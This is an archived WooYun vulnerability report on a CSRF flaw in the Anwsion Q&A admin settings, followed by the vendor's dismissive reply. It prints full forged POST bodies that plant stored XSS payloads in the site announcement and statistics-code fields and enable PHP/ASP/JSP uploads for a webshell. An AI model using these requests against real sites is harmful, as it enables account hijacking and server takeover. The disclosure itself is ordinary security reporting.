当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015496

漏洞标题:anwsion后台一个设置缺陷

相关厂商:anwsion.com

漏洞作者: _Evil

提交时间:2012-12-02 11:24

修复时间:2013-01-16 11:24

公开时间:2013-01-16 11:24

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-12-02: 细节已通知厂商并且等待厂商处理中
2012-12-03: 厂商已经确认,细节仅向厂商公开
2012-12-06: 细节向第三方安全合作伙伴开放
2013-01-27: 细节向核心白帽子及相关领域专家公开
2013-02-06: 细节向普通白帽子公开
2013-02-16: 细节向实习白帽子公开
2013-01-16: 细节向公众公开

简要描述:

这个应该是中。

详细说明:

程序在后台设置没有HASH来限制CSRF的防御,故导致一些可能出现的危害

http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/


site_announce=<script>alert(document.cookie)</script>&url_rewrite_enable=N&request_route=1&request_route_custom=%2Fhome%2Fexplore%2F%3D%3D%3D%2Fexplore%2F%0A%2Fhome%2Fexplore%2Fguest%3D%3D%3D%2Fguest%0A%2Fhome%2Fexplore%2Fcategory-(%3Anum)%3D%3D%3D%2Fcategory%2F(%3Anum)%0A%2Fpeople%2Flist%2F%3D%3D%3D%2Fusers%2F%0A%2Faccount%2Flogin%2F%3D%3D%3D%2Flogin%2F%0A%2Faccount%2Flogout%2F%3D%3D%3D%2Flogout%2F%0A%2Faccount%2Fsetting%2F(%3Aany)%2F%3D%3D%3D%2Fsetting%2F(%3Aany)%2F&online_count_open=Y&online_interval=15&unread_flush_interval=100&auto_question_lock_day=30&statistic_code=%3Cscript%3Ealert(1)%3C%2Fscript%3E&report_reason=%E5%B9%BF%E5%91%8A%2FSPAM%0A%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0A%E8%BF%9D%E8%A7%84%E5%86%85%E5%AE%B9%0A%E6%96%87%E4%B8%8D%E5%AF%B9%E9%A2%98%0A%E9%87%8D%E5%A4%8D%E5%8F%91%E9%97%AE&report_message_uid=1&time_style=Y&admin_login_seccode=Y&_post_type=ajax


site_announce参数对应的是:站点功能->网站公告:(支持HTML)
statistic_code参数对应的是:站点功能->网站统计代码
其他参数默认即可。

http://127.0.0.1:8080/wenda/?/admin/setting/type-content


内容设置里面可以设置上传文件名的后缀,更加危险!!!

quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp&upload_size_limit=512&answer_length_lower=2&question_title_limit=100&comment_limit=0&topic_title_limit=12&upload_avatar_size_limit=512&answer_edit_time=30&uninterested_fold=5&best_answer_day=30&best_answer_min_count=3&best_agree_min_count=3&related_question_keyword_count=&_post_type=ajax


allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp

懂的。。。

漏洞证明:

1.jpg


首页会中XSS,中所有用户。

2.jpg


用户可以直接拿Shell.

修复方案:

加上hash。

版权声明:转载请注明来源 _Evil@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2012-12-03 23:09

厂商回复:

这算不上漏洞吧。为了更好的支持功能而已。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-12-04 09:12 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    简要描述 有意思

  2. 2013-01-03 15:37 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @_@ CSRF可能你们还不清楚,下次我去你们主站钓鱼测试下就知道了哈哈。